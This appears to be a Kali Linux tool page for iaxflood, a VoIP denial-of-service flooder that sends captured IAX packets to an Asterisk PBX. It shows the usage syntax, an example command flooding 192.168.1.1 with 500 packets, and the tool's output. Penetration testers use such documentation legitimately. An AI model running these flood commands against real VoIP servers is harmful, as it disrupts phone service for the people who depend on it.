iaxflood
iaxflood Package Description
A UDP Inter-Asterisk_eXchange (i.e. IAX) packet was captured from an IAX channel between two Asterisk IP PBX’s. The content of that packet is the source of the payload for the attack embodied by this tool. While the IAX protocol header might not match the Asterisk PBX you’ll attack with this tool, it may require more processing on the part of the PBX than a simple udpflood without any payload that even resembles an IAX payload.
Tools included in the iaxflood package
iaxflood – VoIP flooder tool
root@kali:~# iaxflood
usage: iaxflood sourcename destinationname numpackets
usage: iaxflood sourcename destinationname numpackets
iaxflood Usage Example
Flood the VoIP server from the source (192.168.1.202) to the destination (192.168.1.1) by sending 500 packets (500):
root@kali:~# iaxflood 192.168.1.202 192.168.1.1 500
Will flood port 4569 from port 4569 500 times
We have IP_HDRINCL
Will flood port 4569 from port 4569 500 times
We have IP_HDRINCL
No comments